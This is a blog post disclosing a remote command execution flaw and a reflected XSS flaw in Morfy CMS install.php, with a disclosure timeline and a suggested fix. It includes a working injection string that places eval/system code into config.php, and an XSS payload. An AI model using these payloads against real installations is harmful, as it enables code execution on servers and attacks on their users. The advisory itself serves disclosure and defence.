Wednesday, December 17, 2014

Morfy CMS Multiple Vulnerabilities



Site: morfy.monstra.org;

Executing Commands like a Boss! (*cough cough*)

Versions <= 1.0.5 are vulnerable to the following attacks if certain requirements fulfill

1.       Remote Command Execution

Vulnerable Code
./install.php Line 57

                $post_site_url = isset($_POST['site_url']) ? $_POST['site_url'] : '';

./install.php Line 64-77

                file_put_contents('config.php', "<?php
    return array(
        'site_url' => '{$post_site_url}',
        'site_charset' => 'UTF-8',
        'site_timezone' => '{$post_site_timezone}',
        'site_theme' => 'default',
        'site_title' => '{$post_site_title}',
        'site_description' => '{$post_site_description}',
        'site_keywords' => '{$post_site_keywords}',
        'email' => '{$post_email}',
        'plugins' => array(
            'markdown',
            'sitemap',
        ),    );");

The problem is that it adds multiple unsanitized user input inside a php configuration file (config.php)

Exploitation: goto install.php?

 Add

website.com}','yibelo'=> eval("system('dir');"),// as your website

This will store the following in config.php

return array(
        'site_url' => '{website.com}','yibelo'=> eval("system('dir');"),// ',
        'site_charset' => 'UTF-8',
        'site_timezone' => '{$post_site_timezone}',
        'site_theme' => 'default',
        'site_title' => '{$post_site_title}',
        'site_description' => '{$post_site_description}',
        'site_keywords' => '{$post_site_keywords}',
        'email' => '{$post_email}',
        'plugins' => array(
            'markdown',
            'sitemap',
        ),    );");

Then navigate to site.com/config.php then system(‘dir’); (list of files in current directory) will be displayed

http://www.vulnerability-lab.com/get_content.php?id=1367


2.       Cross Site Scripting


Vulnerable Code
./install.php Line 14
$site_url = 'http://'.$_SERVER["SERVER_NAME"].$port.str_replace(array("index.php", "install.php"), "", $_SERVER['PHP_SELF']);
./install.php Line 20
$rewrite_base = str_replace(array("index.php", "install.php"), "", $_SERVER['PHP_SELF']);
./install.php Line 226
<input type="text" name="site_url" class="form-control" id="site_url" placeholder="Enter Site Url" value="<?php echo $site_url; ?>">

Exploitation
Send a GET request payload like
http://localhost/morfy-zone/install.php/”><svg/onload=confirm(1)>

Will output

<input type="text" name="site_url" class="form-control" id="site_url" placeholder="Enter Site Url" value="”><svg/onload=confirm(1)>

And a reflective XSS shall occur if install.php isn't removed.

Vulnerable? The easiest fix (for both issues) will be to remove install.php the second you finished installing morfy.

Another one for the f*** sakes!


2014-10-12 – Contacted Developers (no reply)
2014-11-00 – Another attempt to contact developers (no reply)
2014-12-17 – Public Disclosure.



at

1 comment:

  1. AnonymousJuly 31, 2015 at 3:10 AM

    Good one! I need this php configration file to understand how to fix this issue. Here i get actual info which resolve my problem. Best Event Application iPhone

    ReplyDelete

Note: Only a member of this blog may post a comment.